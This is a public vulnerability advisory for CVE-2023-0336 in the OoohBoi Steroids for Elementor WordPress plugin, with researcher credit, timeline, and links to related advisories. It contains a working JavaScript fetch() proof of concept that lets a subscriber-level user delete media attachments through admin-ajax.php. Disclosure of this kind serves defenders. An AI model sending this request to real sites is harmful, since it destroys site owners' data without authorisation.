OoohBoi Steroids for Elementor < 2.1.5 – Subscriber+ Attachment Deletion | CVE 2023-0336 | Plugin Vulnerabilities

Description

The plugin has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber to delete attachment.

Proof of Concept

Exploit (#1 attachment id delete):

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=exopite-sof-file-batch-delete&media-ids%5B%5D=682&media-ids%5B%5D=683',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

ooohboi-steroids-for-elementor

Fixed in 2.1.5

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

ac74df9a-6fbf-4411-a501-97eba1ad1895

Timeline

Publicly Published

2023-02-28 (about 2 years ago)

Added

2023-02-28 (about 2 years ago)

Last Updated

2023-03-28 (about 2 years ago)

Other

Published

Title

Published

2025-04-09

Title

AnyTrack Affiliate Link Manager < 1.5.5 - Missing Authorization

Published

2022-01-24

Title

Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS

Published

2025-04-29

Title

WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin < 14.13.4 - Subscriber+ Arbitrary Plugin Settings Update

Published

2024-04-25

Title

WP Page Post Widget Clone <= 1.0.1 - Missing Authorization

Published

2024-03-08

Title

EventPrime – Events Calendar, Bookings and Tickets < 3.4.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion